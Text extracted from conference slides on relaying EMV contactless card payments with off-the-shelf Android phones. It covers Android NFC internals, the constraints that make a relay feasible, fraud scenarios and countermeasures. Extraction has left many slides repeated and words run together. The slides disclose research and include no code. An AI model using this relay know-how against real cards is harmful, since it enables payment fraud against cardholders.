Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
